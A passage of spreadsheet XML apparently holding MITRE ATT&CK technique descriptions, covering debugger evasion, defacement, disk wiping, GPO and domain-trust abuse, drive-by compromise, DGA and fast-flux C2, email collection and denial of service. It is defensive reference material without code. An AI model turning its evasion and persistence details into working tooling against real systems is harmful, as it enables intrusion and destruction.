Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.</t>
  </si>
  <si>
    <t>Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github)
Debugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as &lt;code&gt;IsDebuggerPresent()&lt;/code&gt; and &lt;code&gt; NtQueryInformationProcess()&lt;/code&gt;, or manually checking the &lt;code&gt;BeingDebugged&lt;/code&gt; flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as &lt;code&gt;OutputDebugStringW()&lt;/code&gt;.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. 
</t>
  </si>
  <si>
    <t>An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://attack.mitre.org/techniques/T1491/002) may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)</t>
  </si>
  <si>
    <t>An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
One such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows &lt;code&gt;copy /b&lt;/code&gt; command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)
Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.
Containers can be deployed by various means, such as via Docker's &lt;code&gt;create&lt;/code&gt; and &lt;code&gt;start&lt;/code&gt; APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)</t>
  </si>
  <si>
    <t>Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.</t>
  </si>
  <si>
    <t>Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations.</t>
  </si>
  <si>
    <t>Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).
After creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.</t>
  </si>
  <si>
    <t>Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.
Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).</t>
  </si>
  <si>
    <t>Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.
Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)</t>
  </si>
  <si>
    <t>Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.
Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. 
Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.
To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts.
With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).
Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.
Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) </t>
  </si>
  <si>
    <t>Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path &lt;code&gt;\\&amp;lt;DOMAIN&amp;gt;\SYSVOL\&amp;lt;DOMAIN&amp;gt;\Policies\&lt;/code&gt;.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) 
Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.
Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002),  and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)
For example, publicly available scripts such as &lt;code&gt;New-GPOImmediateTask&lt;/code&gt; can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying &lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml&lt;/code&gt;.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in &lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf&lt;/code&gt;, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)</t>
  </si>
  <si>
    <t>Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).
Multiple ways of delivering exploit code to a browser exist, including:
* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.
* Malicious ads are paid for and served through legitimate ad providers.
* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).
Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)
Typical drive-by compromise process:
1. A user visits a website that is used to host the adversary controlled content.
2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. 
    * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
3. Upon finding a vulnerable version, exploit code is delivered to the browser.
4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
    * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.
Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.
Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)</t>
  </si>
  <si>
    <t>Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)</t>
  </si>
  <si>
    <t>Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
One implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)</t>
  </si>
  <si>
    <t>Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)</t>
  </si>
  <si>
    <t>Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
The simplest, "single-flux" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)
In contrast, the "double-flux" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. </t>
  </si>
  <si>
    <t>Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)
Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)</t>
  </si>
  <si>
    <t>Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\&lt;username&gt;\Documents\Outlook Files` or `C:\Users\&lt;username&gt;\AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files)</t>
  </si>
  <si>
    <t>Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.</t>
  </si>
  <si>
    <t>Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.</t>
  </si>
  <si>
    <t>Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.
For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).</t>
  </si>
  <si>
    <t>Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).
To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.
Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.
Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)
In cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)
For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498).
</t>
  </si>
  <si>
    <t>Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition.
Adversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also lead to dependent applications and/or systems to be in a DoS condition. Crashed or restarted applications or systems may also have other effects such as [Data Destruction](https://attack.mitre.org/techniques/T1485), [Firmware Corruption](https://attack.mitre.org/techniques/T1495), [Service Stop](https://attack.mitre.org/techniques/T1489) etc. which may further cause a DoS condition and deny availability to critical information, applications and/or systems. </t>
  </si>
  <si>
    <t>Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)
ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)</t>
  </si>
  <si>
    <t>Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
